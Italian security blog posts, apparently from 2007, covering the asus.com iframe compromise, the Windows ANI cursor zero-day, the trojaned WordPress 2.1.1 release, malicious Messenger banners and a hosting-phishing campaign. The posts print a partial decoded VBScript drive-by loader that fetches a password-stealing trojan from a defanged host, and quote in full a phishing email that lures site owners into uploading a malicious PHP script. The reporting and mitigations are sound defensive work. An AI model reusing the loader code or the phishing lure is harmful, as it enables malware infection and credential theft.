Ieri, tramite il suo blog, Kaspersky ha segnalato la compromissione del sito asus.com. Stando a quanto detto da loro, il codice all’interno della pagina richiamata tramite un iframe inserito nella home page di asus.com sfrutterebbe il recente bug sui file ANI di Microsoft Windows.
L’ISC ha fatto notare che Asus utilizza un round robin DNS per i Webserver. Quello che nessuno ha detto è che l’unico server ad essere stato compromesso è stato 211.72.249.198, l’unico che raggiunto con www.asus.com presenta la pagina internazionale di Asus.

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.

Microsoft sta affrontando quella che definirei una delle più serie vulnerabilità zero-day di Windows.
L’exploit zero-day segnlato il 28 Marzo dal laboratorio di McAfee riguarda un buffer overflow nel gestore dei cursori animati di Windows (user32.dll), esso infatti non controllando l’header dei file “.ani” (animated) causa un bufferoverflow che pu essere usato per compromettere un sistema Windows.
La paternità sulla scoperta del bug spetta a Determina, la quale già dallo scorso 20 Dicembre sta collaborando attivamente con Microsoft per risolvere il problema. Secondo quanto detto nell’advisory ufficiale la patch rilasciata due anni fa da Microsoft, dopo la segnalazione del bug da eEye, il problema dei buffer overflow nell’header dei cursori animati non era stato completamente risolto.

La pericolosità di questo bug sta nel fatto che un file, di icone animate, creato ad arte può essere inserito in qualsiasi pagina Web o e-mail. Addirittura aprendo una cartella con un file “ani” creato ad arte, a causa del servizio anteprima di Windows, senza bisogno di aprire il file sarà possibile far crashare il processo “explorer”.

Tramite il bollettino di Microsoft si apprende che i vettori di attacco sono Internet Explorer, Outlook Express, Outlook e Windows Mail. Microsoft stessa consiglia di leggere le e-mail in modalità testo semplice (plain text) in Outlook 2002 e successivi e Windows Mail. Attenzione perchè con Windows Mail se si inoltra o si risponde ad una e-mail arrivata, anche se è attiva la modalità testo semplice, il problema non si risolve. Da notare inoltre che per qualsiasi versione di Outlook Express attualmente non esistono workaround.

Per ora Firefox sembra non essere interessato dal problema, anche se in teoria potrebbe esserlo in quanto gestisce i cursori animati tramite le API di Windows.

Benchè il bug sia molto recente sono moltissimi gli exploit pubblici e le varianti utilizzate da gruppi senza scrupolo. Come successo circa un mese fa, alcuni siti compromessi, sono utilizzati per veicolare versioni malevole di exploit sfruttanti la vulnerabilità sui cursori animati. L’ISC ha fornito una lista aggiornata dei domini utilizzati e una regola per Snort, che blocca i file “ani”, sicuramente più efficace del blocco a livello DNS.

Microsoft ha fatto sapere che rilascerà la patch ufficiale domani, 3 Aprile, vista la gravità del problema. La software house di Redmond ci tiene a sottolineare che la path al problema era già stata prevista, grazie alla collaborazione con Determina, per il 10 Aprile.

Esistono due patch non ufficiali per risolvere il bug in questione: una rilasciata da eEye e l’altra da ZIRT. Attenzione però al falso senso di sicurezza, esiste un exploit pubblico che riesce a bypassare i controlli messi in pratica dalla patch di eEye.

In definitiva tutti i sistemi Microsoft Windows basati su NT sono vulnerabili: Windows 2000, Windows XP, Windows 2003 e Windows Vista.

Update: come annunciato Microsoft ha pubblicato la patch. Consiglio di installarla il prima possibile.

Il team di sviluppo di WordPress ha pubblicato un annuncio di sicurezza nel quale avverte che il server dove risiedono i file sorgenti di WordPress è stato compromesso e i file di WordPress versione 2.1.1 sono stati modificati per permettere l’esecuzione di codice da remoto.

Il team, avvertito da un ricercatore, è prontamente intervenuto mandando off-line il server compromesso per una analisi forense la quale ha rilevato, appunto, che solo la versione 2.1.1 della famosa piattaforma di blog è stata modificata. Lo spazio temporale di esposizione sembrerebbe essere lungo: dal 25 Febbraio al 2 Marzo.
I file modificati sono due: wp-includes/theme.php e wp-includes/feed.php.
Per sicurezza i file php all’interno di wp-includes, almeno di configurazioni partiolari, non devono essere richiamati via HTTP. Se si utilizza Apache si possono inserire le seguenti direttive all’interno della cartella wp-includes tramite un .htaccess:
<files *.php>
order allow,deny
deny from all
</files>

E’ caldamente consigliato a chiunque utilizza la versione 2.1.1 di aggiornare alla versione 2.1.2 visti anche i bugfix inseriti nella nuova release.

Tralasciando questo scivolone di WP, è bene valutare la timeline delle release. La versione 2.1 uscita il 22 Gennaio è stata sostituita, il 21 Febbraio, con la versione 2.1.1 che ha risolto circa 30 bug a sua volta, il 2 Marzo è stata rilasciata la versione 2.1.2 che ha corretto alcuni bug minori.
WordPress rappresentando una grande fetta di tutti i blog mondiali dovrebbe prendere più sul serio il test e la sicurezza del codice(si vedano le vulnerabilità scoperte dall’inizio del 2007).

Sembra che il sistema dei banner pubblicitari di Microsoft sia stato compromesso e che sia stato sfruttato per inviare, agli utilizzatori di Live Messenger (Msn Messenger), dei banner che inducono ad installare spyware.

Il banner incriminato appare per pubblicizzare un link al download di un programma chiamato “PC-Secure”. Tutti i banner e le message box visualizzate inducono l’utente ad installare software malware e spyware.
La finestra, visibile dopo il click sul banner, chiede se si vuole proseguire al download di “PC-Secure” oppure no. Essendo studiato per scopi malevoli anche la pressione di “Cancel” farà avviare un ActiveX ad hoc. Al momento non c’è soluzione al problema, se dovesse apparire il messaggio l’unica soluzione è chiudere le finestre tramite la classica “X”.

I banner in questione non dovrebbero essere visualizzati agli utenti italiani, ma è consigliabile comunque prestare attenzione.

“Pc-Secure” è una variante di WinFixer e ErrorSafe, malware e spyware già conosciuti. Per maggiori informazioni su di essi leggere il bollettino redatto da Symantec. Anche se si tratta di software risalente al 2005 ed ogni anti-virus è in grado di rilevarlo si trovano guide dettagliate per la rimozione manuale.
Per ulteriori dettagli leggere l’articolo originale su Spyware Sucks.

Alcuni blog di sicurezza negli ultimi giorni stanno ponendo l’attenzione su una e-mail, che tramite phishing, si propone come un controllo dell’ISP che ospitata il proprio dominio.

Gli attacker prendendo le e-mail di contatto specificate nei WHOIS dei domini spediscono una richiesta, in inglese, che inivta ad caricare sul proprio spazio uno script in php (offuscato) che, secondo quanto scoperto dalle prime indagini, raccoglie informazioni sul sistema, apre una shell e installa un bot IRC scritto in Perl.

Solitamente il mittente, falsificato, è il proprio ISP, ma sono state rilevate anche varianti con mittente lo US FDIC (Federal Deposit Insurance Corporation).

I file php allegati che sono stati rilevati fin ora sono:

• webguard.php, size 130990 bytes, MD5: 1071956063131f0fd178ace92ab526bb e SHA1: c47dd28e336030e3d940b66e2884aba91124a831
• vprotect.php, size: 156686 bytes, MD5: 43f3c330f6e85943fd4a60c3b89787e2 e SHA1: d58bcb698417cbcf005a0e26e9e962a5097892d9

Quello che segue è una delle varianti della mail:

Dear #Nome dell’ISP# valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file “guard.php” in: “./public_html”

or (for Windows Based servers which use ASP) upload the file “guard.asp” in: “./wwwroot” in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named “guard.zip”
2) Extract file “guard.php”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “Public_html” or “htdocs”
6) Choose “Upload Files”
7) Upload the file “guard.php”
Check its URL too “http://www.yoursite.com/guard.php”, if it is ok

For Windows based websites that use ASP:
1) Download the attachment named “guard.zip”
2) Extract file “guard.asp”
3) Login to your site Control panel.
4) Open “File Manager” window.
5) Go through “wwwroot” directory
6) Choose “Upload Files”
7) Upload the file “guard.asp”
Check its URL too “http://www.yoursite.com/guard.asp”, if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards

#Nome dell’ISP#

L’attacco è stato rilevato per la prima volta l’8 Febbraio 2007 (Solid Space – Bluehost) mentre i principali blog ne stanno parlando solo negli utlimi giorni.